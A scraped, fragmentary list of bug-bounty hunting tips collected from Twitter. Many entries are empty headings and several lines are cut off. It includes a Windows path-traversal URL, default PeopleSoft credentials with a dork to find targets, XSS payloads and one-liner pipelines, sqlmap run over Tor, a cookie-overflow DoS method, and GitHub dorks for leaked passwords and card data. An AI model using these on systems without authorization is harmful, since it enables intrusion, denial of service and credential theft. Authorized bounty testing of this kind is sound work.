?bounty Tips Collected From Twitter?
?bounty Tips Collected From Twitter?
[ ] Tip 1
[ ] Tip 2
Exploit:
https//anywebsite.com/c:/Windows/Win.ini
[ ] Tip 3
CloudFront bypass:⚔️
Would be interested to know if this is target specific or other CloudFront websites are vulnerabl
[ ] Tip 4
[ ] Tip 5
[ ] Tip 6
[ ] Tip 7
default credentials:
PSADMIN:PSADMIN
PS:PS
PSEM:PSEM
Google Dork: intitle:"Oracle+PeopleSoft+Sign-in"
Wrote a nuclei template to test all permutations
[ ] Tip 8
[ ] Tip 9
https://youtu.be/VsM6ERUx_AA
------------------------------------------
------------------------------------------
Xss payload
https://github.com/Aacle/xss_payload
------------------------------------------
------------------------------------------
Use Nuclei for leaked api.
$ nuclei -t /nuclei-templates/token-spray/ -var token={yourToken}
------------------------------------------
------------------------------------------
#Scan through #TOR
sqlmap -u “http://target_server/” --tor --tor-type=SOCKS5
------------------------------------------
------------------------------------------
Tip: - always check company's/Organization employees GitHub account for leaked ghp_ token,
and check access to each repo of main organization
------------------------------------------
------------------------------------------
[ ] Tip 10
[ ] Tip 11
ssl:"Company Inc"
Filter results by http title.
Start fuzzing an interesting asset.
Found swagger-ui/
Tried swagger ui xss with
https://github.com/seanmarpo/webjars-swagger-xss
[ ] Tip 12
> then you can use this tool to dump all of the website source code
https://github.com/anantshri/svn-extractor
[ ] Tip 13
[ ] Tip 14
[ ] Tip 15
inurl:/ConfigurePortalPages!default.jspa?view=popular
[ ] Tip 16
[ ] Tip 17
GitHub Recon Tip: look for CSV files that have a high chance of containing confidential informati
dork: "org:company extension:csv admin"
leak: "cc number, cvv, email, phone number"
[ ] Tip 18 Oneliner for possible Reflected XSS using Nilo, gxss and Dalfox:
cat targets | waybackurls | anew | grep "=" | gf xss | nilo | gxss -p test | dalfox pipe --skip-b
[ ] Tip 19
Tip : "GET request for XML not found" changes the request to POST with XXE payload
phpmyadmin =>301
PHPmyadmin =>200
PHPMYadmin =>200
PHPMYADMIN =>200
phpMYadmin =>200
phpmyAdmin =>200
[ ] Tip 22 SVN
[ ] Tip 23 xss
in :
firstname:<img src=x
middlename:onerror
lastname:=alert(domain)/>
==========================
1:- Use https://github.com/Leoid/MatchandReplace
2:- Import to burpsuite match and replace.
3:- Run gospider. gospider -s url -a -w --sitemap -r -c 100 -d 8 -p http://127.0.0.1:8080
4:- The Blind xss payload will added automatically by burp and gospider.
Finally:- 4 BLIND XSS REPORTS.
URL that causes the cookie length to exceed request header limits for all requests until the cook
1. Find a Cookie set by a parameter
2. Inject as many commas as you can into the parameter until you DoS that user
1. Grab all URLs from your target which you think hard to hunt or test or static
2. Save all files in any.txt
3. Command : for i in $(cat any.txt); do curl "$i" >> output.txt; done
4. All curled response grep for following
Keywords:
drive. google
docs. google
/spreadsheets/d/
/document/d/
NOTE: This creates lots of junk so make sure you perform in folder , so you can delete later
You will get URLs includes juicy information
https://twitter.com/Pwn2arn/status/1609146484263641089
1. Org:"target" pwd/pass/passwd/password
2. "target. atlassian" pwd/pass/passwd/password
3. "target. okta" pwd/pass/passwd/password
4. "Jira. target" pwd/pass/passwd/password
[ ] Tip 30 soucremap js
https://blog.prodefense.io/little-bug-big-impact-25k-bounty-9e47773f959f
https://github.com/rarecoil/unwebpack-sourcemap
[ ] Tip 31 if a site uses AngularJS,
you might know that URLs typically follow a /CONTENT_TYPE/RECORD_ID pattern, where the
RECORD_ID is an autoincremented integer. Using HackerOne as an example, report URLs follow the pa
www.hackerone.com/reports/12345. Rails applications commonly use integer IDs, so you might priori
insecure direct object reference vulnerabilities because this vulnerability type is easy for deve